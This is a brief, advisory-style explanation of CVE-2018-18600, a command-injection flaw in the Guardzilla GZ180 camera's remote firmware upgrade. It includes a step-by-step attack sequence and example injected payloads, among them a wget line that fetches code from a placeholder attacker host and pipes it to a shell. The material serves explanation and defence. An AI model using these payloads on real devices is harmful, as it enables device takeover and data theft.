CVE-2018-18600

Step 1: Target Identification: The attacker identifies a vulnerable Guardzilla GZ180 device, likely through network scanning or public information.

Step 2: Payload Crafting: The attacker crafts a malicious new firmware version parameter containing injected commands. For example, 1.2.3; id; or 1.2.3; wget http://attacker.com/malware | sh;.

Step 3: Request Submission: The attacker sends a crafted HTTP request to the device's remote upgrade endpoint, including the malicious new firmware version parameter.

Step 4: Command Execution: The device's upgrade script executes the injected commands as part of the firmware update process, due to the lack of input validation.

Step 5: System Compromise: The injected commands are executed with the privileges of the upgrade process, allowing the attacker to gain control of the device, potentially including remote shell access, data exfiltration, or further lateral movement.

The vulnerability lies within the remote upgrade functionality of the Guardzilla GZ180. The device's firmware update mechanism fails to properly sanitize the new firmware version parameter before passing it to a system command for execution. Specifically, the device likely uses a command-line interface (CLI) call, such as system('upgrade_firmware.sh -v <new_firmware_version>'), where <new_firmware_version> is directly derived from user input. An attacker can inject malicious commands into this parameter, such as ; id; or && wget http://attacker.com/malware | sh, which are then executed with the privileges of the process running the upgrade script. The root cause is a lack of input validation and output encoding, allowing for command injection. The use of a shell command directly with unsanitized input is the core flaw.